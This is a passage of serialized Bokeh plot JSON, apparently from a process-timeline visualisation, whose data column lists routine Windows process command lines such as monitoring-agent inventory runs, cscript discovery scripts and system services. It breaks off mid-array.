,4,6,8,10]},\"id\":\"4934\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"4935\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"end\":1.5,\"start\":-0.5},\"id\":\"4818\",\"type\":\"Range1d\"},{\"attributes\":{\"coordinates\":null,\"formatter\":{\"id\":\"4902\"},\"group\":null,\"major_label_policy\":{\"id\":\"4903\"},\"ticker\":{\"id\":\"4829\"},\"visible\":false},\"id\":\"4828\",\"type\":\"LinearAxis\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"4913\"},{\"id\":\"4914\"},{\"id\":\"4915\"},{\"id\":\"4916\"},{\"id\":\"4917\"},{\"id\":\"4918\"},{\"id\":\"4919\"},{\"id\":\"4920\"},{\"id\":\"4921\"},{\"id\":\"4922\"},{\"id\":\"4923\"},{\"id\":\"4924\"}]},\"id\":\"4825\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"4913\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"4829\",\"type\":\"BasicTicker\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"4914\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"4915\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"4924\",\"type\":\"YearsTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"4920\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"4919\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"4850\",\"type\":\"DataRange1d\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"4916\",\"type\":\"DaysTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"4837\"}},\"id\":\"4833\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"4834\",\"type\":\"ResetTool\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"4917\",\"type\":\"DaysTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"4918\",\"type\":\"DaysTicker\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"4923\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"4822\",\"type\":\"LinearScale\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"4921\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"4820\",\"type\":\"LinearScale\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"4922\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"below\":[{\"id\":\"4856\"},{\"id\":\"4861\"}],\"center\":[{\"id\":\"4859\"}],\"height\":120,\"renderers\":[{\"id\":\"4868\"},{\"id\":\"4874\"}],\"title\":{\"id\":\"4846\"},\"toolbar\":{\"id\":\"4860\"},\"toolbar_location\":null,\"width\":900,\"x_range\":{\"id\":\"4848\"},\"x_scale\":{\"id\":\"4852\"},\"y_range\":{\"id\":\"4850\"},\"y_scale\":{\"id\":\"4854\"}},\"id\":\"4845\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"data\":{\"CommandLine\":[\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe\\n/Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"cmd.exe /c\\nc:\\\\Diagnostics\\\\WindowsSimulateDetections.bat\\nc:\\\\Diagnostics\\\\UserTmp\",\"dism /online /enable-feature /featurename:File-\\nServices /NoRestart\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\TEMP\\\\CC563BBE-\\nDE32-44D3-8E35-F3FC78E72E40\\\\dismhost.exe\\n{D57BA872-53C0-424D-80AE-E49112D1CF04}\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\winsxs\\\\amd64_microsoft-windows-servicin\\ngstack_31bf3856ad364e35_10.0.14393.2602_none_7ee60\\n20e2207416d\\\\TiWorker.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"C:\\\\Windows\\\\system32\\\\wermgr.exe -upload\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\System32\\\\svchost.exe -k WerSvcGroup\",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 6060 -s 472\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\Windo\\nwsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd\\n9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\n(x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua\\n/installsource scheduler\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\n(x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua\\n/installsource scheduler\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\system32\\\\MusNotification.exe Display\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo\\n\\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\"\\nGetInventory \\\"C:\\\\Program Files\\\\Microsoft\\nMonitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602\\n681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\"\\n\\\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service\\nState\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff\\n-ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured\\n-Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" 